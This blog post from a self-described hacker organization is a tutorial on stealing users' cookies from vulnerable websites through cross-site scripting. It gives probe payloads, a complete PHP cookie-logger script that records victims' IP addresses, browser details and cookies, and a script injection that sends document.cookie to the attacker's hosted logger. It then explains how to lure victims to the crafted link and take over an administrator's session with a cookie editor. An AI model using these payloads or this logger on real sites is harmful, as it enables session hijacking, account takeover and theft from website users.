Share |
--- Welcome To Sky Net - The Organization of Hackers ---

Wednesday, August 31, 2011

How to xss a website and steal cookies

How to xss a website and steal cookies
What is XSS, what can I accomplish with it?
XSS is common in search bars and comment boxes. We can then inject almost any type of programming language into the website. Whether it be Javascript, HTML or XML. XSS is mainly directed at Javascript injection. However, you can inject other languages which will be shown later.
Most people use it to display messages on the website, redirect you to their defacement and even put cookie loggers and XSS shells on the website.


What causes the vulnerability?
Poor PHP coding within text boxes and submission forms. They were too lazy to code it properly allowing us to inject strings into the source code, that would then give us the conclusion of what we put in since it's also in the source code. They did not bother to filter what we type in. They allowed characters such as ">, ", /", etc.

What types of XSS are there?
There are two types of XSS. Persistent and non-persistent. If you inject some code into the website and it sticks to the website (you leave the page and come back, and it's still there) then it is persistent. That is good. When you get non-persistent it will not stick on the website, you will only see it once. With persistent XSS you can do much more, leave messages, redirect them, etc. With non-persistent the most you can do is upload a cookie logger.

How to test for XSS vulnerabilities.
To test if the website is vulnerable to XSS we want to go to a search box and inject some Javascript. We've found a search box and now we want to use Javascript to alert a message so we can see if the Javascript was successfully executed.
Code:
<script>alert('XSS');</script>
We now see a pop up message on our screen saying "XSS". This is what it should look like: click hereIn some cases, a message might not pop up. If it doesn't work, check the source code and have a look at the output. Most of the time the error requires you to make a little change.
Code:
"><script>alert('XSS');</script>
Okay, we have found out that it is vulnerable. We can now move on.
we are today talking about non-persistent XSS
with non-persistent and basic web-based programming knowledge we can make a cookie logger. We may also need advanced social engineering skills for people to open our cookie logger.
How to make a cookie logger.
Make two files:
1. namewhateveryoulink.php (For capture slave cookies)
2. log.txt (to log captured cookies on a txt file this file will be empty)
1. cookie capture code belove copy this code and paste on notepad and name it whaterver u like here are using hell.php
<?php
function GetIP()
{
if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown"))
$ip = getenv("HTTP_CLIENT_IP");
else if (getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown"))
$ip = getenv("HTTP_X_FORWARDED_FOR");
else if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown"))
$ip = getenv("REMOTE_ADDR");
else if (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], "unknown"))
$ip = $_SERVER['REMOTE_ADDR'];
else
$ip = "unknown";
return($ip);
}
function logData()
{
$ipLog="log.txt";
$cookie = $_SERVER['QUERY_STRING'];
$register_globals = (bool) ini_get('register_gobals');
if ($register_globals) $ip = getenv('REMOTE_ADDR');
else $ip = GetIP();
$rem_port = $_SERVER['REMOTE_PORT'];
$user_agent = $_SERVER['HTTP_USER_AGENT'];
$rqst_method = $_SERVER['METHOD'];
$rem_host = $_SERVER['REMOTE_HOST'];
$referer = $_SERVER['HTTP_REFERER'];
$date=date ("l dS of F Y h:i:s A");
$log=fopen("$ipLog", "a+");
if (preg_match("/\bhtm\b/i", $ipLog) || preg_match("/\bhtml\b/i", $ipLog))
fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE{ : } $date | COOKIE: $cookie <br>");
else
fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE: $date | COOKIE: $cookie \n\n");
fclose($log);
}
logData();
?>
2. now open an notepad and save as log.txt
both file hell.php and log.txt upload any free webhost like t35 ,000webhost etc
now where u injected code:-
"><script>alert('XSS');</script>
this time inject this code:-
<script>document.location="http://yoursite.com/hell.php?cookie" + document.cookie;</script>
when u inject this code taget website will be redirect to our cookie caputer that time u have to copy that url that will look like this somthing
http://www.targetwebsite.com/search_results/search/&view_all=1&chg_filter=1&searchType=content_basic&search_terms=%3Cscript%3Edocument.location=%22http://tuts.djoedjoe.com/basicxss/eng/hell.php%22;%3C/script%3E
Now make a new post and send this link to any one link will redirect slave to our cookie capture and cookies will be logged on log txt file click here 
What can I do with someone else's cookie?
Once you have someone else's cookie you can use a cookie editor, (search for one on Google) go to the victims website, change your cookie to their's and you should be logged in as the user they are. Example; if your target is "admin" and "admin" has logged into the site, you send him your cookie logger and steal his cookie, you then change your cookie to the admin's cookie, and you will then have access to the website and do as you wish.click here
that's it you can do lot more things with Xss this is just an simple tutorial. 

0 comments:

Post a Comment